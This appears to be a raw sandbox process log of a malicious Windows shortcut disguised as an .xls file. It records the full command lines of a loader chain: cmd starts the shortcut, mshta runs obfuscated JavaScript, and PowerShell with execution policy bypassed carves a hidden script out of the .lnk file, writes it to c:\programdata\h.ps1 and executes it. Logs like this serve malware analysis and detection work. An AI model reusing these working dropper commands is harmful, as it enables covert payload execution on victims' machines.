cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MULbcsTupkzLQbl" C:\Users\test22\AppData\Local\Temp\20250410_70404.xls.lnk
3048mshta.exe "C:\Windows\System32\mshta.exe" javascript:g="c:\\prog"+"ramdata\\";m=" -Encod"+"ing Byte;sc ";a="rshell -ep bypa"+"ss ";p="$w ([byte[]]($f | select -Skip 0x0976)) -Force";s="a=new Activ"+"eXObject('WScr"+"ipt.Shell');a.Run(c,0,true);close();";c="powe"+a+"-c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -Expan"+"dProperty Name;if($k.c"+"ount -eq 0){$k=Get-ChildItem $env:TEMP\\*\\*.lnk | where-object{$_.length -eq $t};};$w='"+g+"h.ps1';$f=gc $k"+m+p+m+g+"41026 0;"+"powe"+a+"-f $w;";eval(s);
2200powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x19c6;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\h.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0976)) -Force -Encoding Byte;sc c:\programdata\41026 0;powershell -ep bypass -f $w;
2356powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\h.ps1
1608